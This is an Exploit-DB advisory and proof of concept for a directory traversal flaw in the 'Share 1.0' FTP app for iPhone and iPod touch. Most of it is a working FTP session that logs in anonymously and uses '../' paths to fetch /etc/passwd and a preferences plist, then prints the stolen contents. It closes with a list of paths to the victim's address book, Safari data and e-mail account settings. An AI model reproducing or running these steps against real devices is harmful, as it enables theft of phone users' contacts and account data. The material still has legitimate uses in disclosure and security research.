iOS Share 1.0 - Directory Traversal

2011-02-24T00:00:00
ID EDB-ID:16231
Type exploitdb
Reporter R3d@l3rt, Sp@2K, Sunlight
Modified 2011-02-24T00:00:00

Description

iOS Share 1.0 - Directory Traversal. Remote exploit for ios platform

                                        
                                            # Exploit Title: Share v1.0 for iPhone / iPod touch, Directory Traversal 
# Date: 02/24/2011
# Author: R3d@l3rt, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id350671847?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the Share.  
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 20000
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 5
-rw-r--r--     1 mobile mobile      17389 Jan 06 12:55 315978923.951142.png
-rw-r--r--     1 mobile mobile     447330 Jan 06 16:22 315991374.643888.png
-rw-r--r--     1 mobile mobile      17389 Jan 06 16:44 315992677.644726.png
-rw-r--r--     1 mobile mobile     242857 Feb 24 15:52 320223133.910055.png
-rw-r--r--     1 mobile mobile        493 Feb 24 15:50 SpreadMobData.plist

226 Transfer complete.
ftp: 390 bytes received in 0.00Seconds 390000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.01Seconds 52.47Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false


C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist